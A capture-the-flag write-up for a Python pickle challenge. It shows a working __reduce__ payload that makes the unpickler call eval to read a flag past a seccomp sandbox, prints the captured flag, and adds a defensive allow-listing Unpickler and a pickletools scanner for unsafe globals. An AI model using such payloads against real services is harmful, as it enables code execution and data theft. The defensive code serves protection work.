This challenge is about Python pickle. The remote script fetches the flag as below:

import socket

class Flag(object):
    def __init__(self):
        # fetch the flag from an internal service at startup, before the sandbox is applied
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("172.17.0.1", 1234))
        self.flag = s.recv(1024).strip()
        s.close()

flag = Flag()
Once the Flag class is instantiated, seccomp is used to restrict many syscalls, e.g. the socket calls used in the Flag class will no longer work:

import sys
from seccomp import SyscallFilter, Arg, KILL, ALLOW, EQ, MASKED_EQ

f = SyscallFilter(KILL)                      # default action: kill the process
f.add_rule_exactly(ALLOW, "read")
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stdout.fileno()))
f.add_rule_exactly(ALLOW, "write", Arg(0, EQ, sys.stderr.fileno()))
f.add_rule_exactly(ALLOW, "close")
f.add_rule_exactly(ALLOW, "exit_group")
f.add_rule_exactly(ALLOW, "open", Arg(1, EQ, 0))   # read-only opens (O_RDONLY == 0)
f.add_rule_exactly(ALLOW, "stat")
f.add_rule_exactly(ALLOW, "lstat")
f.add_rule_exactly(ALLOW, "lseek")
f.add_rule_exactly(ALLOW, "fstat")
f.add_rule_exactly(ALLOW, "getcwd")
f.add_rule_exactly(ALLOW, "readlink")
f.add_rule_exactly(ALLOW, "mmap", Arg(3, MASKED_EQ, 2, 2))   # only MAP_PRIVATE mappings
f.add_rule_exactly(ALLOW, "munmap")
f.load()                                     # install the filter for the current process

But since the flag is already present in the scope of __main__ (no syscall is needed to read it), we can fetch it using the pickle payload below:
import pickle

class payload(object):
    def __reduce__(self):
        # unpickling calls eval() on this string, which reads the already-fetched flag from __main__
        return (eval, ("__import__('__main__').flag.flag",))

sploit = pickle.dumps(payload())
The flag for the challenge is 32c3_rooDahPaeR3JaibahYeigoong
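The payload works because a pickle may name any importable global (here builtins.eval) and the default Unpickler resolves and calls it. As an added defensive example that is not part of the original writeup, the code below shows the two controls a service accepting pickles should have: an Unpickler whose find_class() only resolves allow-listed globals, and a static scanner built on pickletools that lists the globals a blob references without loading it. The SAFE_GLOBALS allow-list and the sample pickles are constructed for this example.

```python
import io
import pickle
import pickletools
from collections import OrderedDict
# Allow-list of the only globals an unpickler may resolve (an assumption for
# this example). builtins.eval, __main__.flag and anything else is refused.
SAFE_GLOBALS = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """find_class() is the hook pickle uses for GLOBAL/STACK_GLOBAL; gate it."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def try_restricted_load(data):
    """Return (True, object) on success or (False, reason) when a global is refused."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)

def referenced_globals(data):
    """List the globals a pickle would resolve by walking its opcodes, never loading it.
    Simplification: STACK_GLOBAL operands are the two most recent inline strings."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":              # protocol <= 3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":      # protocol >= 4: module and name on the stack
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

def safe_to_load(data):
    """Static gate: every referenced global must be on the allow-list."""
    return all(g in SAFE_GLOBALS for g in referenced_globals(data))

# Constructed samples: pickling a function stores only a global reference to it
# (nothing is called), which is exactly the kind of reference a scanner must catch.
EVAL_REF_P4 = pickle.dumps(eval, protocol=4)
EVAL_REF_P3 = pickle.dumps(eval, protocol=3)
BENIGN_DICT = pickle.dumps({"k": 1})
BENIGN_OD = pickle.dumps(OrderedDict(k=1))

if __name__ == "__main__":
    for label, blob in [("eval/p4", EVAL_REF_P4), ("dict", BENIGN_DICT), ("odict", BENIGN_OD)]:
        print(label, referenced_globals(blob), safe_to_load(blob), try_restricted_load(blob)[0])
```

The static scan is useful as a pre-filter on ingress (it never executes the blob), but the find_class() gate is the control that actually stops a REDUCE from calling eval.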